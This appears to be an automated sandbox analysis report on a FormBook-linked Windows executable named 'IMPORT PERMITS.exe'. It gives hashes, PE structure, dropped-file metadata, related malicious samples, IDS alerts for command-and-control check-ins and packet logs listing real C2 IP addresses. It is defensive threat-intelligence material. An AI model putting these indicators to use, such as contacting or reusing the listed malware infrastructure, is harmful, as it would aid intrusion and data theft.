                                                                                                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                              • 118.27.125.181
                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 133.130.35.90
                                                                                                                              CLOUDFLARENETUS#U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              y445LJgbHB.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              2RSApyPwtP.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              8p4DVNCBTB.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              woqOhh17tj.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              zK3150CS8q.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              COGENT-174USA4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 154.23.184.185
                                                                                                                              nuklear.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 143.241.178.72
                                                                                                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 206.232.91.38
                                                                                                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 38.100.34.94
                                                                                                                              armv7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 149.50.116.115
                                                                                                                              x86_32.elfGet hashmaliciousGafgytBrowse
                                                                                                                              • 38.63.56.191
                                                                                                                              debug.dbg.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 38.171.134.102
                                                                                                                              upb.htaGet hashmaliciousUnknownBrowse
                                                                                                                              • 38.180.193.61
                                                                                                                              DHL Express Doc 01143124.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 38.47.232.160
                                                                                                                              DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 154.23.184.95
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:C:\Users\user\Desktop\IMPORT PERMITS.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:true
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                              Process:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):114688
                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):7.927652102098847
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                              File name:IMPORT PERMITS.exe
                                                                                                                              File size:775'168 bytes
                                                                                                                              MD5:b648db78eac01c6c7311e34d232b4ed7
                                                                                                                              SHA1:3efe3363ea8f532301252ac23c0b0df116836e67
                                                                                                                              SHA256:1eef3c00ea6fe6b3e757e7ee213f2cf19a76cb290ceb108b5dc63fe7eb86012c
                                                                                                                              SHA512:ec3e6dbe7e9b16d46bc9619b320458d2c2103143d54b0650120e851dedfbbffbba5ed57711c68b88cdc10c80bd214b1bbe9e9beef364e1e8bdea1ba14d94fc9e
                                                                                                                              SSDEEP:12288:UoaDPw1Qk89TmyMWS9eL+u3Tk95RnDvzvvJP5VNj702GW1mytw1KRj3F4wOHaLI1:kLw9gTFMW/L+u3MnbtPZcW15tbRjCwZm
                                                                                                                              TLSH:08F4121073F89744E6BB6BF62AB411A157B7BD16793AD38C0D8010CE0EB3B914A64F27
                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                              Entrypoint:0x4be6f2
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x8FE9D11E [Fri Jul 6 04:48:30 2046 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbe69e | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x61c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbc078 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbc6f8 | 0xbc800 | d07bba9729cd7a0aaa9f4e251db9ece8 | False | 0.9470843003978779 | data | 7.935527441310873 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x61c | 0x800 | a234f2f454627bae8fbd5123d3a74fbf | False | 0.33740234375 | data | 3.457025003311642 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0xc | 0x200 | b702a3de3a1b80630722f5de3039d8ab | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0090 | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data |  |  | 0.4251101321585903
RT_MANIFEST | 0xc042c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-02T08:10:59.878096+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49389 | 216.219.93.17 | 80 | TCP
2024-11-02T08:11:15.071202+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.4 | 49735 | TCP
2024-11-02T08:11:40.879537+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 65456 | TCP
2024-11-02T08:11:42.331245+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 65457 | TCP
2024-11-02T08:11:48.187130+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 65458 | 3.33.130.190 | 80 | TCP
2024-11-02T08:11:48.187130+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 65458 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:03.991850+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 65495 | 172.67.131.32 | 80 | TCP
2024-11-02T08:12:06.533842+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 65510 | 172.67.131.32 | 80 | TCP
2024-11-02T08:12:09.071921+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 65522 | 172.67.131.32 | 80 | TCP
2024-11-02T08:12:11.647489+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49155 | 172.67.131.32 | 80 | TCP
2024-11-02T08:12:11.647489+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49155 | 172.67.131.32 | 80 | TCP
2024-11-02T08:12:19.003440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49191 | 103.191.208.137 | 80 | TCP
2024-11-02T08:12:21.549456+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49207 | 103.191.208.137 | 80 | TCP
2024-11-02T08:12:24.096413+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49221 | 103.191.208.137 | 80 | TCP
2024-11-02T08:12:27.377474+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49236 | 103.191.208.137 | 80 | TCP
2024-11-02T08:12:27.377474+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49236 | 103.191.208.137 | 80 | TCP
2024-11-02T08:12:41.641466+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49320 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:45.069257+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49333 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:47.612436+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49343 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:50.205320+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49352 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:50.205320+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49352 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:56.018224+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49353 | 3.33.130.190 | 80 | TCP
2024-11-02T08:12:58.570549+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49354 | 3.33.130.190 | 80 | TCP
2024-11-02T08:13:01.288609+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49355 | 3.33.130.190 | 80 | TCP
2024-11-02T08:13:03.761774+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49356 | 3.33.130.190 | 80 | TCP
2024-11-02T08:13:03.761774+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49356 | 3.33.130.190 | 80 | TCP
2024-11-02T08:13:10.087282+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49357 | 38.47.232.160 | 80 | TCP
2024-11-02T08:13:12.971506+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49358 | 38.47.232.160 | 80 | TCP
2024-11-02T08:13:15.330687+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49359 | 38.47.232.160 | 80 | TCP
2024-11-02T08:13:17.596335+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49360 | 38.47.232.160 | 80 | TCP
2024-11-02T08:13:17.596335+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49360 | 38.47.232.160 | 80 | TCP
2024-11-02T08:13:24.458604+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49361 | 34.92.109.131 | 80 | TCP
2024-11-02T08:13:26.971383+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49362 | 34.92.109.131 | 80 | TCP
2024-11-02T08:13:29.424467+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49363 | 34.92.109.131 | 80 | TCP
2024-11-02T08:13:32.065334+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49364 | 34.92.109.131 | 80 | TCP
2024-11-02T08:13:32.065334+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49364 | 34.92.109.131 | 80 | TCP
2024-11-02T08:13:37.859117+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49365 | 162.0.211.143 | 80 | TCP
2024-11-02T08:13:40.407355+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49366 | 162.0.211.143 | 80 | TCP
2024-11-02T08:13:43.042243+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49367 | 162.0.211.143 | 80 | TCP
2024-11-02T08:13:45.573385+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49368 | 162.0.211.143 | 80 | TCP
2024-11-02T08:13:45.573385+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49368 | 162.0.211.143 | 80 | TCP
2024-11-02T08:13:51.622380+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49369 | 195.110.124.133 | 80 | TCP
2024-11-02T08:13:54.215448+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49370 | 195.110.124.133 | 80 | TCP
2024-11-02T08:13:56.693329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49371 | 195.110.124.133 | 80 | TCP
2024-11-02T08:13:59.268290+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49372 | 195.110.124.133 | 80 | TCP
2024-11-02T08:13:59.268290+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49372 | 195.110.124.133 | 80 | TCP
2024-11-02T08:14:05.362082+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49373 | 185.68.16.94 | 80 | TCP
2024-11-02T08:14:08.037680+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49374 | 185.68.16.94 | 80 | TCP
2024-11-02T08:14:10.552132+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49375 | 185.68.16.94 | 80 | TCP
2024-11-02T08:14:13.000112+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49376 | 185.68.16.94 | 80 | TCP
2024-11-02T08:14:13.000112+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49376 | 185.68.16.94 | 80 | TCP
2024-11-02T08:14:19.625515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49377 | 163.44.176.12 | 80 | TCP
2024-11-02T08:14:22.198624+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49378 | 163.44.176.12 | 80 | TCP
2024-11-02T08:14:24.717662+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49379 | 163.44.176.12 | 80 | TCP
2024-11-02T08:14:28.163661+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49380 | 163.44.176.12 | 80 | TCP
2024-11-02T08:14:28.163661+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49380 | 163.44.176.12 | 80 | TCP
2024-11-02T08:14:34.038547+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49381 | 199.59.243.227 | 80 | TCP
2024-11-02T08:14:36.590786+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49382 | 199.59.243.227 | 80 | TCP
2024-11-02T08:14:39.166080+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49383 | 199.59.243.227 | 80 | TCP
2024-11-02T08:14:41.739639+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49384 | 199.59.243.227 | 80 | TCP
2024-11-02T08:14:41.739639+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49384 | 199.59.243.227 | 80 | TCP
2024-11-02T08:14:48.893588+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49385 | 103.233.82.58 | 80 | TCP
2024-11-02T08:14:51.440454+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49386 | 103.233.82.58 | 80 | TCP
2024-11-02T08:14:53.987224+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49387 | 103.233.82.58 | 80 | TCP
2024-11-02T08:14:56.690300+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49388 | 103.233.82.58 | 80 | TCP
2024-11-02T08:14:56.690300+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49388 | 103.233.82.58 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                              Nov 2, 2024 08:11:47.519301891 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:47.524187088 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:47.524255037 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:47.532429934 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:47.537276983 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:48.186441898 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:48.186991930 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:48.187129974 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:48.212764978 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:48.218523026 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.271856070 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.276737928 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.276806116 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.285598040 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.290532112 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.991750002 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.991781950 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.991849899 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.994746923 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.995356083 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:04.799344063 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.817351103 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.822240114 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:05.822325945 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.831248999 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.836081028 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:06.533761978 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:06.533776045 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:06.533842087 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:07.346242905 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.364366055 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.369385958 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.369457006 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.378828049 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.383706093 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383774996 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383816957 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383826971 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383879900 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.384052992 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.387695074 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.387706995 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.387716055 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:09.069901943 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:09.071850061 CET8065522172.67.131.32192.168.2.4
